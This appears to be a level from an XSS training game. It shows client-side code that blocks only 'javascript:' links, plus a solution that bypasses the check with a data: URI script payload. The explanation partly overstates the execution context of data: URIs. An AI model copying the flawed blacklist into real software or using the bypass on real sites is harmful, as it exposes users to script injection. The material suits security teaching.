Level 7: The Unsafe URI

MISSION: The system blocks 'javascript:' links. Find another protocol to execute code when the link is clicked.

[VIEW AVATAR]
/// SOURCE CODE INSPECTOR ///

// Client-side URI routing logic
const params = new URLSearchParams(window.location.search);
const url = params.get('payload');

if (url) {
    // Flawed Validation: The developer only thought to block javascript:
    // What other URI schemes can execute code or embed HTML?
    if (url.toLowerCase().startsWith('javascript:')) {
        document.getElementById('avatar-link').href = 'about:blank';
        console.error("VIOLATION: javascript: scheme blocked.");
    } else {
        document.getElementById('avatar-link').href = url;
    }
}

/// DECRYPTION COMPLETE ///

The developer only blacklisted the javascript: pseudo-protocol. However, modern browsers support navigating to data: URIs containing raw HTML, which execute in the context of the page (or as a blank origin depending on browser context, but still trigger XSS).

Payload:

data:text/html,<script>alert(1)</script>